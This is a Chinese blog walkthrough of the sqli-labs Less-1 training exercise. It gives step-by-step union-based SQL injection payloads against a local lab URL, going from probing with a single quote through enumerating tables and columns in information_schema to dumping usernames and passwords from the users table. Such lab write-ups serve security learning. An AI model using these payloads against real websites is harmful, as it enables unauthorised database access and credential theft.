SQL注入之sqlilabs:less-1

  • Post author:
  • Post category:其他


题目类型:基于报错的GET单引号字符型注入

测试地址:http://192.168.101.9/sqlilabs/Less-1/?id=1

访问该网址,页面返回结果如图


0x01


判断注入参数类型

在URL后添加一个单引号 ,页面报错。根据报错信息判断,此处为字符型注入。

页面返回结果如图


0x02


判断字段数量

根据order by语句和错误提示,得出字段数为3。

Payload -> 192.168.101.9/sqlilabs/Less-1/?id=1′ order by 3–+

页面返回结果如图





0x03


判断是否回显及回显位置

将前面的id改为-1,根据union语句,得出回显位置为2,3。

Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1′ union select 1,2,3–+

如图所示





0x04


查询数据库名称

根据回显位置,将对应sql语句放置在2和3处。

Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1′ union select 1,version(),database()–+

页面返回结果如图





0x05


查询表名

数据版本为5.0以上,从默认表information_schema中取数。

Payload ->  192.168.101.9/sqlilabs/Less-1/?id=-1′ union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=’security’–+

页面返回结果如图





0x06


查询列名

Payload -> 192.168.101.9/sqlilabs/Less-1/?id=-1′ union select 1,version(),group_concat(column_name) from information_schema.columns where table_name=’users’–+

页面返回结果如图





0x07


查询数据

Payload ->  192.168.101.9/sqlilabs/Less-1/?id=-1′ union select 1,group_concat(username),group_concat(password) from users–+

页面返回结果如图











Bingo




!拿到后台管理员




admin









版权声明:本文为Dmajorcanon原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。